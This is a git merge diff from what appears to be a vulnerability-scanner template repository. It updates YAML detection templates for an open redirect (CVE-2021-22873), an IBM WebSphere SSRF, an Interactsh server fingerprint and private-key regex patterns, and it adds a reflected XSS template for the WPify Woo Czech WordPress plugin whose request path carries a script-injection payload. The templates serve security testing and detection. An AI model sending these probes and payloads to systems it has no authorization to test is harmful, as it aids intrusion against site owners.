Merge branch 'master' into dashboard
commit
28d6f55f15
|
@ -22,3 +22,4 @@ vulnerabilities/other/royalevent/royalevent-management-xss.yaml
|
||||||
vulnerabilities/other/royalevent/royalevent-stored-xss.yaml
|
vulnerabilities/other/royalevent/royalevent-stored-xss.yaml
|
||||||
vulnerabilities/wordpress/new-user-approve-xss.yaml
|
vulnerabilities/wordpress/new-user-approve-xss.yaml
|
||||||
vulnerabilities/wordpress/sym404.yaml
|
vulnerabilities/wordpress/sym404.yaml
|
||||||
|
vulnerabilities/wordpress/wpify-woo-czech-xss.yaml
|
||||||
|
|
|
@ -28,10 +28,10 @@ requests:
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<h1> Interactsh Server </h1>"
|
- "Interactsh Server"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
# Enhanced by mp on 2022/06/27
|
# Enhanced by mp on 2022/06/27
|
|
@ -15,7 +15,10 @@ info:
|
||||||
cvss-score: 6.1
|
cvss-score: 6.1
|
||||||
cve-id: CVE-2021-22873
|
cve-id: CVE-2021-22873
|
||||||
cwe-id: CWE-601
|
cwe-id: CWE-601
|
||||||
tags: cve,cve2021,redirect
|
metadata:
|
||||||
|
shodan-query: http.favicon.hash:106844876
|
||||||
|
verified: "true"
|
||||||
|
tags: cve,cve2021,redirect,revive
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -30,12 +33,8 @@ requests:
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
redirects: true
|
redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: regex
|
||||||
status:
|
part: header
|
||||||
- 200
|
regex:
|
||||||
- type: word
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
words:
|
|
||||||
- "<h1> Interactsh Server </h1>"
|
|
||||||
part: body
|
|
||||||
|
|
|
@ -12,6 +12,9 @@ info:
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748
|
||||||
classification:
|
classification:
|
||||||
cve-id: CVE-2021-27748
|
cve-id: CVE-2021-27748
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.html:"IBM WebSphere Portal"
|
||||||
tags: cve,cve2021,hcl,ibm,ssrf,websphere
|
tags: cve,cve2021,hcl,ibm,ssrf,websphere
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
@ -28,9 +31,8 @@ requests:
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<h1> Interactsh Server </h1>"
|
- "Interactsh Server"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# Enhanced by mp on 2022/06/27
|
|
|
@ -13,12 +13,12 @@ file:
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "\"BEGIN OPENSSH PRIVATE KEY\""
|
- "BEGIN OPENSSH PRIVATE KEY"
|
||||||
- "\"BEGIN PRIVATE KEY\""
|
- "BEGIN PRIVATE KEY"
|
||||||
- "\"BEGIN RSA PRIVATE KEY\""
|
- "BEGIN RSA PRIVATE KEY"
|
||||||
- "\"BEGIN DSA PRIVATE KEY\""
|
- "BEGIN DSA PRIVATE KEY"
|
||||||
- "\"BEGIN EC PRIVATE KEY\""
|
- "BEGIN EC PRIVATE KEY"
|
||||||
- "\"BEGIN PGP PRIVATE KEY BLOCK\""
|
- "BEGIN PGP PRIVATE KEY BLOCK"
|
||||||
- "\"ssh-rsa\""
|
- "ssh-rsa"
|
||||||
- "\"ssh-dsa\""
|
- "ssh-dsa"
|
||||||
- "\"ssh-ed25519\""
|
- "ssh-ed25519"
|
||||||
|
|
|
@ -4,6 +4,9 @@ info:
|
||||||
name: Interactsh Server
|
name: Interactsh Server
|
||||||
author: pdteam
|
author: pdteam
|
||||||
severity: info
|
severity: info
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.html:"Interactsh Server"
|
||||||
tags: tech,interactsh
|
tags: tech,interactsh
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
@ -11,14 +14,19 @@ requests:
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}"
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<h1> Interactsh Server </h1>"
|
- "Interactsh Server"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '<b>(.*)<\/b> server'
|
- '<b>(.*)<\/b> server'
|
||||||
- 'from <b>(.*)<\/b>'
|
- 'from <b>(.*)<\/b>'
|
||||||
|
|
|
@ -0,0 +1,35 @@
|
||||||
|
id: wpify-woo-czech-xss
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WPify Woo Czech < 3.5.7 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: Akincibor
|
||||||
|
severity: medium
|
||||||
|
description: The plugin uses the Vies library v2.2.0, which has a sample file outputting $_SERVER['PHP_SELF'] in an attribute without being escaped first, leading to a Reflected Cross-Site Scripting. The issue is only exploitable when the web server has the PDO driver installed, and write access to the example directory (otherwise an exception will be raised before the payload is output)..
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/5c66c32b-22f2-4b59-a6b2-b8da944cdc3c
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: wp,wordpress,xss,wp-plugin,wpify
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-content/plugins/wpify-woo/deps/dragonbe/vies/examples/async_processing/queue.php/"><script>alert(document.domain)</script>'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '"><script>alert(document.domain)</script>'
|
||||||
|
- 'Add a new VAT ID to the queue'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue